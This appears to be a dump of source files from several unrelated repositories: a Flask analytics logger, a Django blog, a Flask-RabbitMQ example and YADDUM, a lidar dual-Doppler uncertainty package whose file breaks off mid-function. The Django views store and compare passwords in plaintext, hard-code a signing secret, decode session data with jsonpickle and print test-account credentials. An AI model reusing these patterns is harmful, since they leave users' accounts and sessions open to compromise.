from ._app import db
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
class LogTable(db.Model):
__tablename__ = 'LogTable'
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.DateTime, default=datetime.now(), nullable=False)
cid = db.Column(db.Integer)
uid = db.Column(db.Integer)
ip = db.Column(db.Text)
url = db.Column(db.Text)
referrer = db.Column(db.Text)
param = db.Column(db.Text)
def save_to_db(self):
db.session.add(self)
db.session.commit()
| {"/view/views.py": ["/view/_app.py", "/view/models.py"], "/view/models.py": ["/view/_app.py"], "/view/_app.py": ["/view/models.py"]} |
50,020 | melqueawq/analytics | refs/heads/master | /view/_app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
import logging
import json
import datetime
import urllib
import os
app = Flask(__name__, template_folder='../templates',
static_folder="../static")
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get(
'DATABASE_URL') or "sqlite:///data.db"
app.config['SQLALCHEMY_TRUCK_MODIFICATIONS'] = True
db = SQLAlchemy(app)
Migrate(app, db)
loggers = {}
# 設定ファイル読み込み
with open('config.json', 'r') as f:
config = json.load(f)
@app.before_first_request
def create_tables():
from .models import LogTable
db.create_all()
def getLogger(name=__name__, filename=None):
# 任意のLoggerを取得
global loggers
if loggers.get(name):
return loggers.get(name)
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
if(filename):
handler = logging.FileHandler(filename, 'a')
else:
handler = logging.StreamHandler()
logger.addHandler(handler)
loggers[name] = logger
return logger
def conversion(request):
# コンバージョンをログに保存
now = datetime.datetime.now()
ip = request.remote_addr
conv = request.args.get('param')
url = urllib.parse.unquote(request.url)
logger = getLogger('conv', 'conv.log')
logger.info('{0:%Y/%m/%d %H:%M:%S} - '.format(now) +
ip + ' - ' + conv + ' - ' + url)
def campaign(adid, request):
# 広告流入をログに保存
now = datetime.datetime.now()
url = request.args.get('url')
ref = request.args.get('ref')
conv = request.args.get('param')
# 媒体が定義されていれば処理
for v in config['campaign']:
if v['ad'] == adid and v['cv'] == conv:
logger = getLogger('campaign', 'campaign.log')
logger.info('{0:%Y/%m/%d %H:%M:%S} - '.format(now) +
str(v['id']) + ' - ' + v['ad'] + ' - ' +
url + ' ' + ref)
def uid_entry(cid, uid):
# uidを保存しているファイル読み出し
try:
with open('member.json', 'r') as f:
j = json.load(f)
except FileNotFoundError:
j = {}
# cidが登録されていなければ作成
if cid not in j:
j[cid] = []
# uidがデータ内に含まれていなければ追加
if uid not in j[cid]:
with open('member.json', 'w') as f:
j[cid].append(uid)
json.dump(j, f, indent=2)
| {"/view/views.py": ["/view/_app.py", "/view/models.py"], "/view/models.py": ["/view/_app.py"], "/view/_app.py": ["/view/models.py"]} |
50,024 | keephunger/django_blog | refs/heads/master | /blog/migrations/0001_initial.py | # Generated by Django 2.2.10 on 2020-02-28 18:36
from django.db import migrations, models
import django.db.models.deletion
import extra_apps.DjangoUeditor.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='博客标题')),
('date_time', models.DateTimeField(auto_now_add=True, verbose_name='日期')),
('content', extra_apps.DjangoUeditor.models.UEditorField(blank=True, null=True, verbose_name='内容')),
('view', models.BigIntegerField(default=0, verbose_name='阅读数')),
('comment_value', models.BigIntegerField(default=0, verbose_name='评论数')),
],
options={
'verbose_name': '文章',
'verbose_name_plural': '文章',
'ordering': ['-date_time'],
},
),
migrations.CreateModel(
name='BlogUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=20, verbose_name='名字')),
('password', models.CharField(max_length=45, verbose_name='密码')),
('email', models.CharField(max_length=45, verbose_name='邮箱')),
('active_flag', models.IntegerField(default=0, verbose_name='激活标志')),
],
options={
'verbose_name': '用户',
'verbose_name_plural': '用户',
'db_table': 'blog_user',
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(max_length=200, verbose_name='评论内容')),
('user', models.CharField(max_length=200, verbose_name='发布者')),
('date_time', models.DateTimeField(auto_now_add=True, verbose_name='日期')),
('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Article', verbose_name='文章')),
],
options={
'verbose_name': '评论',
'verbose_name_plural': '评论',
},
),
migrations.AddField(
model_name='article',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.BlogUser', verbose_name='作者'),
),
]
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,025 | keephunger/django_blog | refs/heads/master | /blog/templatetags/extra_tags.py | # my_filter.py
from django import template
register = template.Library()
@register.filter
def link_str(value): # 定义过滤器
value = str(value).split('<')[1]
return value.strip('p>') | {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,026 | keephunger/django_blog | refs/heads/master | /blog/models.py | from django.db import models
# Create your models here.
from extra_apps.DjangoUeditor.models import UEditorField
class BlogUser(models.Model):
username = models.CharField(max_length=20, verbose_name='名字')
password = models.CharField(max_length=45, verbose_name='密码')
email = models.CharField(max_length=45, verbose_name='邮箱')
active_flag = models.IntegerField(default=0, verbose_name='激活标志')
def __str__(self):
return self.username
class Meta:
db_table = 'blog_user'
verbose_name = '用户'
verbose_name_plural = verbose_name
class Article(models.Model):
title = models.CharField(max_length=200, verbose_name='博客标题') # 博客标题
date_time = models.DateTimeField(auto_now_add=True, verbose_name='日期') # 博客日期
content = UEditorField( width=600, height=300, toolbars="full", imagePath="images/", filePath="files/", upload_settings={"imageMaxSize":1204000},
settings={}, verbose_name='内容', blank=True, null=True) # 文章正文
author = models.ForeignKey('BlogUser', verbose_name='作者', on_delete=models.CASCADE)
view = models.BigIntegerField(default=0, verbose_name='阅读数') # 阅读数
comment_value = models.BigIntegerField(default=0, verbose_name='评论数') # 评论数
def __str__(self):
return self.title
def viewed(self):
"""
增加阅读数
:return:
"""
self.view += 1
self.save(update_fields=['view'])
def commenced(self):
"""
增加评论数
:return:
"""
self.comment_value += 1
self.save(update_fields=['comment_value'])
class Meta: # 按时间降序
verbose_name = "文章"
verbose_name_plural = verbose_name
ordering = ['-date_time']
class Comment(models.Model):
content = models.CharField(max_length=200, verbose_name='评论内容')
user = models.CharField(max_length=200, verbose_name='发布者')
date_time = models.DateTimeField(auto_now_add=True, verbose_name='日期')
article = models.ForeignKey('Article', verbose_name='文章', on_delete=models.CASCADE)
class Meta:
verbose_name = "评论"
verbose_name_plural = verbose_name
ordering = ['-date_time']
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,027 | keephunger/django_blog | refs/heads/master | /blog/views.py | import jsonpickle as jsonpickle
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.http import HttpResponse, JsonResponse, HttpResponseRedirect
from django.shortcuts import render
# Create your views here.
from django.urls import reverse
from django.views import View
from itsdangerous import TimedJSONWebSignatureSerializer
from blog.forms import ArticleModelForm
from blog.models import BlogUser, Article, Comment
# 检查是否登录的装饰器
def login_detection(fun1):
"""
使用了这个装饰,如果登陆了,此界面就无法访问,直接跳到主页
:param fun1:
:return:
"""
def fun2(*args, **kwargs):
user = args[0].session.get('user', 0)
if (user):
return HttpResponseRedirect(reverse('blog:blog_index'))
return fun1(*args, **kwargs)
return fun2
def blog_index(request):
"""
主页
:param request:
:return:
"""
user = request.session.get('user', 0)
context = pagenator_articles(request) # 调用文章分页器
if (user):
user = jsonpickle.decode(user)
context['theuser'] = user
return render(request, 'index.html', context)
return render(request, 'index.html', context)
class BlogLogin(View):
"""
登录
"""
@staticmethod
@login_detection
def get(request):
return render(request, 'login.html')
@staticmethod
def post(request):
user = BlogUser.objects.filter(username=request.POST.get('username')).first()
pwd = request.POST.get('pwd')
if user and user.password == pwd and user.active_flag == 1:
request.session['user'] = jsonpickle.encode(user)
return JsonResponse({'flag': 0})
else:
return JsonResponse({'flag': -1})
class Register(View):
"""
注册
"""
@staticmethod
@login_detection
def get(request):
return render(request, 'register.html')
@staticmethod
def post(request):
from django.core.mail import send_mail
# 获取信息
username = request.POST.get('username')
user = BlogUser.objects.filter(username=username)
# 加密邮箱验证信息
t = TimedJSONWebSignatureSerializer('hello你爱你', expires_in=3600)
res = t.dumps({'user_name': username})
res = res.decode()
#获取信息
pwd = request.POST.get('pwd')
email = request.POST.get('email')
# 如无重复名创建用户
if len(user) == 0:
BlogUser.objects.create(username=username, password=pwd, email=email)
#已激活
elif user.first().active_flag == 1:
return JsonResponse({'flag': -1})
send_mail(
subject='欢迎注册',
message="",
from_email='254414795@qq.com',
recipient_list=[email],
fail_silently=False,
html_message='<a href="https://stormy-brushlands-24614.herokuapp.com/activate/?token={}">点击注册</a>'.format(
res)
)
return HttpResponse('请前往邮箱验证')
def activate(request):
"""
激活
:param request:
:return:
"""
token = request.GET.get('token')
t = TimedJSONWebSignatureSerializer('hello你爱你', expires_in=3600)
user_name = t.loads(token)
list = BlogUser.objects.filter(username=user_name['user_name'])
if len(list) == 1:
list[0].active_flag = 1
list[0].save()
return HttpResponseRedirect(reverse('blog:blog_index'))
return HttpResponse('注册失败')
def logout(request):
"""
登出
:param request:
:return:
"""
if request.session.get('user', ''):
del request.session['user']
return render(request, 'index.html')
def show_article(request):
"""
展示文章
:param request:
:return:
"""
id = request.GET.get('id', '')
if not id: return HttpResponse(0) # 错误
article = Article.objects.filter(id=id).first()
if not article: return HttpResponse(0) # 错误
article.viewed() # 增加阅读1
context = pagenator_comments(request, article) # 评论分页器
context["article"] = article
# 检测是否登录
user = request.session.get('user', 0)
# 是否已经登录
if (user):
user = jsonpickle.decode(user)
context["theuser"] = user
return render(request, 'article.html', context)
return render(request, 'article.html', context)
class Publish(View):
@staticmethod
def get(request):
# 检测是否登录
user = request.session.get('user', 0)
# 是否已经登录
if (user):
user = jsonpickle.decode(user)
form = ArticleModelForm # 富文本
return render(request, 'publish_art.html', {'theuser': user, 'form': form})
return render(request, 'login.html')
@staticmethod
def post(request):
form = ArticleModelForm(request.POST)
user = jsonpickle.decode(request.session.get('user', ''))
if form.is_valid():
form.instance.author = user # 附上user
form.save()
return HttpResponseRedirect(reverse('blog:show_article') + f'?id={form.instance.id}')
return HttpResponse('faile')
def comment(request):
"""
发布评论
:param request:
:return:
"""
article_id = request.GET.get('id', '')
user = request.session.get('user', '')
if not user : return HttpResponse("请登录,测试用户:18832059218,密码123456")
user = jsonpickle.decode(user)
comment = request.POST.get('comment', '')
if article_id and user and comment:
article = Article.objects.get(id=article_id)
Comment.objects.create(user=user.username, content=comment, article=article).save()
article.commenced()
return HttpResponseRedirect(reverse('blog:show_article') + f'?id={article_id}')
else:
return HttpResponse(0)
def pagenator_articles(request):
"""
文章分页器
:param request:
:return:
"""
num = request.GET.get('num', '1')
if num.isdigit():#防止非数字
num = int(num)
else:
num=1
articles = Article.objects.all()
paginator = Paginator(articles, 2)
try:
article_per_page = paginator.page(num) # 获取当前页码的记录
except PageNotAnInteger: # 如果用户输入的页码不是整数时,显示第1页的内容
article_per_page = paginator.page(1)
except EmptyPage: # 如果用户输入的页数不在系统的页码列表中时,显示最后一页的内容
article_per_page = paginator.page(paginator.num_pages)
# 每页开始页码
begin = (num - 5)
if begin < 1:
begin = 1
# 每页结束页码
end = begin + 9
if end > paginator.num_pages:
end = paginator.num_pages
if end <= 10:
begin = 1
else:
begin = end - 9
pagelist = range(begin, end + 1)
context = {'article_per_page': article_per_page, 'pagelist': pagelist}
return context
def pagenator_comments(request, article):
"""
评论分页器
:param request:
:return:
"""
num = request.GET.get('num', '1')
if num.isdigit():#防止非数字
num = int(num)
else:
num=1
comments = Comment.objects.filter(article=article)
paginator = Paginator(comments, 2)
try:
comment_per_page = paginator.page(num) # 获取当前页码的记录
except PageNotAnInteger: # 如果用户输入的页码不是整数时,显示第1页的内容
comment_per_page = paginator.page(1)
except EmptyPage: # 如果用户输入的页数不在系统的页码列表中时,显示最后一页的内容
comment_per_page = paginator.page(paginator.num_pages)
# 每页开始页码
begin = (num - 5)
if begin < 1:
begin = 1
# 每页结束页码
end = begin + 9
if end > paginator.num_pages:
end = paginator.num_pages
if end <= 10:
begin = 1
else:
begin = end - 9
pagelist = range(begin, end + 1)
context = {'comment_per_page': comment_per_page, 'pagelist': pagelist}
return context
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,028 | keephunger/django_blog | refs/heads/master | /blog/admin.py | from django.contrib import admin
# Register your models here.
from blog.models import Article, BlogUser
admin.site.register(Article)
admin.site.register(BlogUser)
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,029 | keephunger/django_blog | refs/heads/master | /blog/urls.py |
from django.contrib import admin
from django.urls import path
from blog import views
app_name="blog"
urlpatterns = [
path(r'',views.blog_index,name="blog_index"),
path(r'login/',views.BlogLogin.as_view(),name="blog_login"),#登录
path(r'register/',views.Register.as_view(),name="blog_register"),#注册
path(r'logout/', views.logout, name="blog_logout"),#注销
path(r'activate/',views.activate),#邮箱激活
path(r'publish/',views.Publish.as_view(),name='publish'),#发布文章
path(r'article/', views.show_article,name='show_article'),#阅览文章
path(r'comment/', views.comment, name='blog_comment'), # 阅览文章
]
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,042 | pushy-site/flask-rabbitmq | refs/heads/master | /example/app/test/default.py | # encoding:utf-8
from example.app import rpc
class DefaultExchange(object):
def __init__(self):
pass
def callback(self, ch, method, props, body):
print(body)
def declare(self):
rpc.declare_default_consuming('hello', self.callback)
# rpc.send(
# body='hello world', exchange='', key='hello'
# ) | {"/example/app/test/default.py": ["/example/app/__init__.py"]} |
50,043 | pushy-site/flask-rabbitmq | refs/heads/master | /example/app/__init__.py | #encoding:utf-8
from flask import Flask
from example import config
from flask_rabbitmq import RabbitMQ
from flask_rabbitmq import Queue
app = Flask(__name__)
app.config.from_object(config)
queue = Queue()
rpc = RabbitMQ(app, queue)
from example.app import test
| {"/example/app/test/default.py": ["/example/app/__init__.py"]} |
50,047 | andh-dtu/YADDUM | refs/heads/master | /yaddum/__init__.py | from .yaddum import Uncertainty
| {"/yaddum/__init__.py": ["/yaddum/yaddum.py"], "/test/test.py": ["/yaddum/__init__.py"]} |
50,048 | andh-dtu/YADDUM | refs/heads/master | /test/test.py | import yaddum as yaddum
import numpy as np
import matplotlib.pyplot as plt
import xarray as xr
lidar_uncertainty = yaddum.Uncertainty()
model_pars={'wind_speed':10,
'upward_air_velocity':0,
'wind_from_direction':0,
'reference_height':100,
'shear_exponent':0.2}
lidar_uncertainty.add_atmosphere('pl_1', 'power_law', model_pars)
lidar_uncertainty.add_measurements('mesh', 'horizontal_mesh',
resolution = 10,
mesh_center = np.array([0,0,100,100]),
extent = 5000)
points = np.array([[500,-500,100,100], [1000,2,300,300]])
lidar_uncertainty.add_measurements('pts', 'points', positions = points)
uncertainty_pars = {'u_estimation':0.1,
'u_azimuth':0.1,
'u_elevation':0.1,
'u_range':1}
lidar_pos_1 = np.array([0,0,0])
lidar_pos_2 = np.array([1000,1000,0])
lidar_uncertainty.add_lidar('koshava', lidar_pos_1, **uncertainty_pars)
lidar_uncertainty.add_lidar('whittle', lidar_pos_2, **uncertainty_pars)
lidar_uncertainty.calculate_uncertainty(['koshava', 'whittle'], 'mesh', 'pl_1',
uncertainty_model='dual-Doppler')
lidar_uncertainty.uncertainty.azimuth_gain.sel(instrument_id = 'koshava').plot()
plt.show() | {"/yaddum/__init__.py": ["/yaddum/yaddum.py"], "/test/test.py": ["/yaddum/__init__.py"]} |
50,049 | andh-dtu/YADDUM | refs/heads/master | /setup.py | # Always prefer setuptools over distutils
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
name='yaddum', # Required
version='0.2.0', # Required
description='Yet Another Dual-Doppler Uncertainty Model (YADDUM): Python libpackage for dual-Doppler uncertainty assessment', # Optional
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/niva83/YADDUM', # Optional
author='Nikola Vasiljevic', # Optional
author_email='niva@dtu.dk', # Optional
classifiers=[ # Optional
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3.7',
],
packages=['yaddum'], # Required
python_requires='>=3.7.3',
install_requires=[
'xarray',
'netCDF4',
'matplotlib',
'jupyter',
'pylint'
]
)
| {"/yaddum/__init__.py": ["/yaddum/yaddum.py"], "/test/test.py": ["/yaddum/__init__.py"]} |
50,050 | andh-dtu/YADDUM | refs/heads/master | /yaddum/yaddum.py | """This is a Python package for dual-Doppler uncertainty assessment.
It includes several class which are used to perform the assessment.
"""
from math import cos, sin, pi, radians
import numpy as np
import xarray as xr
def wind_vector_to_los(u,v,w, azimuth, elevation, ignore_elevation = True):
"""Projects wind vector to the beam line-of-sight (LOS).
Parameters
----------
u : ndarray
nD array of `float` or `int` corresponding to u component of wind.
In cf convention v is eastward_wind.
Units m/s.
v : ndarray
nD array `float` or `int` corresponding to v component of wind.
In cf convention v is northward_wind.
Units m/s.
w : ndarray
nD array `float` or `int` corresponding to w component of wind.
In cf convention w is upward_air_velocity.
Units m/s.
azimuth : ndarray
nD array `float` or `int` corresponding to LOS direction in azimuth.
Units degree.
elevation : ndarray
nD array `float` or `int` corresponding to LOS direction in elevation.
Units degree.
Returns
-------
los : ndarray
nD array `float` or `int` corresponding to LOS component of wind.
In cf convention w is radial_velocity_of_scatterers_toward_instrument.
Units m/s.
Notes
-----
LOS or radial wind speed, :math:`{V_{radial}}`, is calculated using the
following mathematical expression:
.. math::
V_{radial} = u \sin({\\theta})\cos({\\varphi}) +
v \cos({\\theta})\cos({\\varphi}) +
w\sin({\\varphi})
where :math:`{\\theta}` and :math:`{\\varphi}` are the azimuth and
elevation angle of the beam, :math:`{u}` is the wind component toward East,
:math:`{v}` is the wind component toward North, and :math:`{w}` is the
upward air velocity. The sign of :math:`{V_{radial}}` is assumed to be
positive if wind aprroaches the instrument, otherwise it is negative.
"""
# handles both single values as well arrays
azimuth = np.radians(azimuth)
elevation = np.radians(elevation)
if ignore_elevation:
los = u * np.sin(azimuth) + v * np.cos(azimuth)
else:
los = u * np.sin(azimuth) * np.cos(elevation) + \
v * np.cos(azimuth) * np.cos(elevation) + \
w * np.sin(elevation)
return los
def generate_mesh(center, map_extent, mesh_res):
"""
Generate a horizontal mesh containing equally spaced (measurement) points.
Parameters
----------
center : ndarray
1D array containing data with `float` or `int` type corresponding to
Northing, Easting, Height agl and asl coordinates of the mesh center.
1D array data are expressed in meters.
map_extent : int
map extent in Northing (y) and Easting (x) in meters.
mesh_res : int
mesh resolution for Northing (y) and Easting (x) in meters.
Returns
-------
mesh : ndarray
nD array containing a list of mesh points.
x : ndarray
nD shaped array for Easting (x) coordinate of mesh points.
y : ndarray
nD shaped array for Northing (y) coordinate of mesh points.
Notes
-----
The generated mesh will be squared, i.e. having the same length in both dimensions.
"""
map_corners = np.array([center[:2] - int(map_extent),
center[:2] + int(map_extent)])
x, y = np.meshgrid(
np.arange(map_corners[0][0], map_corners[1][0]+ int(mesh_res), int(mesh_res)),
np.arange(map_corners[0][1], map_corners[1][1]+ int(mesh_res), int(mesh_res))
)
H_asl = np.full(x.shape, center[2])
H_agl = np.full(x.shape, center[3])
mesh = np.array([x, y, H_asl, H_agl]).T.reshape(-1, 4)
return x, y, mesh
def generate_beam_coords(lidar_pos, meas_pt_pos):
"""
Generates beam steering coordinates in spherical coordinate system.
Parameters
----------
lidar_pos : ndarray
1D array containing data with `float` or `int` type corresponding to
Northing, Easting and Height coordinates of a lidar.
Coordinates unit is meter.
meas_pt_pos : ndarray
nD array containing data with `float` or `int` type corresponding to
Northing, Easting and Height coordinates of a measurement point(s).
Coordinates unit is meter.
Returns
-------
beam_coords : ndarray
nD array containing beam steering coordinates for given measurement points.
Coordinates have following structure [azimuth, elevation, range].
Azimuth and elevation angles are given in degree.
Range unit is meter.
"""
# testing if meas_pt has single or multiple measurement points
if len(meas_pt_pos.shape) == 2:
x_array = meas_pt_pos[:, 0]
y_array = meas_pt_pos[:, 1]
z_array = meas_pt_pos[:, 2]
else:
x_array = np.array([meas_pt_pos[0]])
y_array = np.array([meas_pt_pos[1]])
z_array = np.array([meas_pt_pos[2]])
# calculating difference between lidar_pos and meas_pt_pos coordiantes
dif_xyz = np.array([lidar_pos[0] - x_array, lidar_pos[1] - y_array, lidar_pos[2] - z_array])
# distance between lidar and measurement point in space
distance_3D = np.sum(dif_xyz**2,axis=0)**(1./2)
# distance between lidar and measurement point in a horizontal plane
distance_2D = np.sum(np.abs([dif_xyz[0],dif_xyz[1]])**2,axis=0)**(1./2)
# in radians
azimuth = np.arctan2(x_array-lidar_pos[0], y_array-lidar_pos[1])
# conversion to metrological convention
azimuth = (360 + azimuth * (180 / pi)) % 360
# in radians
elevation = np.arccos(distance_2D / distance_3D)
# conversion to metrological convention
elevation = np.sign(z_array - lidar_pos[2]) * (elevation * (180 / pi))
beam_coord = np.transpose(np.array([azimuth, elevation, distance_3D]))
return beam_coord
class Atmosphere:
"""
A class containing methods and attributes related to atmosphere.
Methods
-------
add_atmosphere(atmosphere_id, model, model_parameters)
Adds description of the atmosphere to the atmosphere dictionary.
"""
def __init__(self):
self.atmosphere = {}
self.wind_field = None
self.verbos = True
def add_atmosphere(self, atmosphere_id, model, model_parameters):
"""
Adds description of the atmosphere to the atmosphere dictionary.
This description is used to calculate the lidar uncertainty.
Parameters
----------
atmosphere_id : str, required
String which identifies atmosphere instance in the dictionary.
model : str, required
This is a string describing which atmospheric model is used.
model_parameters : dict, required
This is a dictionary which contains parameters which detail
the selected atmospheric model.
Raises
------
UnsupportedModel
If the selected model is not supported by the package.
Notes
-----
Currently method 'add_atmosphere' only supports power law model of the
atmosphere. The power law model requires following inputs in a form of
Python dictionary: horizontal speed, wind direction, shear exponent and
reference height (height above ground level) for horizontal speed.
TODO
----
- Support other atmospheric models (e.g., log wind profile)
"""
if (model != 'power_law'):
raise ValueError("UnsupportedModel")
if ('wind_speed' in model_parameters
and model_parameters['wind_speed'] is not None
and model_parameters['wind_speed'] is not 0
and 'wind_from_direction' in model_parameters
and model_parameters['wind_from_direction'] is not None
and 'shear_exponent' in model_parameters
and model_parameters['shear_exponent'] is not None
and model_parameters['shear_exponent'] is not 0
and 'reference_height' in model_parameters
and model_parameters['reference_height'] is not None
and model_parameters['reference_height'] >= 0):
wind_speed = model_parameters["wind_speed"]
wind_from_direction = model_parameters["wind_from_direction"]
u = - wind_speed * sin(radians(wind_from_direction))
v = - wind_speed * cos(radians(wind_from_direction))
w = model_parameters['upward_air_velocity'] if 'upward_air_velocity' in model_parameters else 0
model_parameters.update({
'eastward_wind' : u,
'northward_wind' : v,
'upward_air_velocity' : w
})
dict_input = {atmosphere_id: {
"model" : model,
"model_parameters": model_parameters}}
self.atmosphere.update(dict_input)
if self.verbos:
print('Atmosphere \'' + atmosphere_id
+ '\' added to the atmosphere dictionary,'
+ ' which now contains '
+ str(len(self.atmosphere))
+ ' atmosphere instance(s).')
else:
print('Incorrect parameters for power law model!')
class Measurements(Atmosphere):
"""
A class containing methods and attributes related to measurements.
Methods
-------
add_atmosphere(atmosphere_id, model, model_parameters)
Adds description of the atmosphere to the atmosphere dictionary.
"""
def __init__(self):
self.measurements = {}
Atmosphere.__init__(self)
@staticmethod
def check_measurement_positions(measurement_positions):
"""
Validates the measurement position
Parameters
----------
measurement_positions : ndarray
nD array containing data with `float` or `int` type corresponding
to Northing, Easting and Height coordinates of the instrument.
nD array data are expressed in meters.
Returns
-------
True / False
See also
--------
add_measurements() : adds measurements to the measurement dictionary
"""
if(type(measurement_positions).__module__ == np.__name__):
if (len(measurement_positions.shape) == 2
and measurement_positions.shape[1] == 4): # it is 4 since due to height asl and agl
return True
else:
# print('Wrong dimensions! Must be == (n,3) where ')
# print('n == number of measurement points!')
# print('Measurement positions were not added!')
return False
else:
# print('Input is not numpy array!')
# print('Measurement positions were not added!')
return False
def add_measurements(self, measurements_id, category='points',
utm_zone = '', **kwargs):
"""
Adds desired measurement positions to the measurements dictionary.
The measurement points are used for the uncertainty calculation.
Parameters
----------
measurements_id : str, required
String which identifies measurements instance in the dictionary.
category : str, required
Indicates category of measurements that are added to the dictionary.
This paremeter can be equal to 'points' or 'horizontal_mesh'.
Default value is set to 'points'.
utm_zone : str, optional
Indicates UTM zone in which points are located.
Default values is set to None.
Other Parameters
-----------------
positions : ndarray
nD array containing data with `float` or `int` type corresponding
to Northing, Easting, Height above ground level, and Height above
sea level coordinates of the measurement pts.
nD array data are expressed in meters.
This kwarg is required if category=='points'
mesh_center : ndarray
nD array containing data with `float` or `int` type
corresponding to Northing, Easting and Height above ground level,
and Height above sea level of the mesh center.
nD array data are expressed in meters.
This kwarg is required if category=='horizontal_mesh'.
extent : int
mesh extent in Northing and Easting in meters.
This kwarg is required if category=='horizontal_mesh'.
resolution : int
mesh resolution in meters.
This kwarg is required if category=='horizontal_mesh'.
Raises
------
UnsupportedCategory
If the category of measurement points is not supported.
PositionsMissing
If category=='points' but the position of points is not provided.
InappropriatePositions
If the provided points positions are not properly provided.
MissingKwargs
If one or more kwargs are missing.
TODO
----
- Accept other categories such as LOS, PPI, RHI, VAD and DBS
"""
if category not in {'points', 'horizontal_mesh'}:
raise ValueError("UnsupportedCategory")
if category == 'points' and 'positions' not in kwargs:
raise ValueError("PositionsMissing")
if (category == 'points' and
'positions' in kwargs and
not(self.check_measurement_positions(kwargs['positions']))):
raise ValueError("InappropriatePositions")
if category == 'horizontal_mesh' and set(kwargs) != {'resolution','mesh_center', 'extent'}:
raise ValueError("MissingKwargs")
if category == 'points':
measurements_dict = {measurements_id :
{'category': category,
'positions' : kwargs['positions']
}
}
self.measurements.update(measurements_dict)
elif category == 'horizontal_mesh':
x, y, mesh_points = generate_mesh(kwargs['mesh_center'],
kwargs['extent'],
kwargs['resolution'])
nrows, ncols = x.shape
measurements_dict = {measurements_id :
{'category': category,
'nrows' : nrows,
'ncols' : ncols,
'positions' : mesh_points
}
}
self.measurements.update(measurements_dict)
if self.verbos:
print('Measurements \'' + measurements_id
+ '\' added to the measurement dictionary,'
+ ' which now contains '
+ str(len(self.measurements))
+ ' measurement instance(s).')
def __create_wind_ds(self, atmosphere, measurements,
u, v, w, wind_speed, wind_from_direction):
"""
Creates wind field xarray object.
Parameters
----------
atmosphere : dict
Dictionary containing information on atmosphere.
measurements : dict
Dictionary containing information on measurements.
u : ndarray
nD array of `float` or `int` corresponding to u component of wind.
In cf convention v is eastward_wind.
Units m/s.
v : ndarray
nD array `float` or `int` corresponding to v component of wind.
In cf convention v is northward_wind.
Units m/s.
w : ndarray
nD array `float` or `int` corresponding to w component of wind.
In cf convention w is upward_air_velocity.
Units m/s.
wind_speed : ndarray
nD array `float` or `int` corresponding to the wind speed.
Units m/s.
wind_from_direction : ndarray
nD array `float` or `int` corresponding to the wind direction.
Units degree.
Notes
----
Currently this method only supports points and horizontal mesh data structures.
The method is inline with the cf convention for variable naming.
"""
positions = measurements['positions']
category = measurements['category']
# make special data structure for PPI scans
if category == 'points':
self.wind_field = xr.Dataset({'eastward_wind':(['point'], u),
'northward_wind':(['point'], v),
'upward_air_velocity':(['point'], w),
'wind_speed':(['point'], wind_speed),
'wind_from_direction':(['point'], wind_from_direction)},
coords={'Easting':(['point'], positions[:,0]),
'Northing':(['point'], positions[:,1]),
'Height_asl': (['point'], positions[:,2]),
'Height_agl': (['point'], positions[:,3])}
)
if category == 'horizontal_mesh':
nrows = measurements['nrows']
ncols = measurements['ncols']
self.wind_field = xr.Dataset({'eastward_wind':(['Northing', 'Easting'], u.reshape(nrows, ncols).T),
'northward_wind':(['Northing', 'Easting'], v.reshape(nrows, ncols).T),
'upward_air_velocity':(['Northing', 'Easting'], w.reshape(nrows, ncols).T),
'wind_speed':(['Northing', 'Easting'], wind_speed.reshape(nrows, ncols).T),
'wind_from_direction':(['Northing', 'Easting'], wind_from_direction.reshape(nrows, ncols).T)},
coords={'Easting': np.unique(positions[:,0]),
'Northing': np.unique(positions[:,1]),
'Height_asl': positions[1,2],
'Height_agl': positions[1,3]}
)
self.wind_field.attrs['title'] = 'Wind characteristics at measurement points of interest'
self.wind_field.attrs['convention'] = 'cf'
self.wind_field.attrs['atmospheric_model'] = atmosphere['model']
self.wind_field.attrs['atmospheric_model_parameters'] = atmosphere['model_parameters']
self.wind_field.eastward_wind.attrs['units'] = 'm s-1'
self.wind_field.northward_wind.attrs['units'] = 'm s-1'
self.wind_field.upward_air_velocity.attrs['units'] = 'm s-1'
self.wind_field.wind_speed.attrs['units'] = 'm s-1'
self.wind_field.wind_from_direction.attrs['units'] = 'degree'
self.wind_field.Easting.attrs['units'] = 'm'
self.wind_field.Northing.attrs['units'] = 'm'
self.wind_field.Height_asl.attrs['units'] = 'm'
self.wind_field.Height_agl.attrs['units'] = 'm'
def calculate_wind(self, measurements_id, atmosphere_id):
"""
Calculates wind characteristics at the selected measurement points.
Parameters
----------
measurements_id : str, required
String which identifies measurements instance in the dictionary.
atmosphere_id : str, required
String which identifies atmosphere instance in the dictionary which
is used to calculate wind vector at measurement points
"""
atmosphere = self.atmosphere[atmosphere_id]
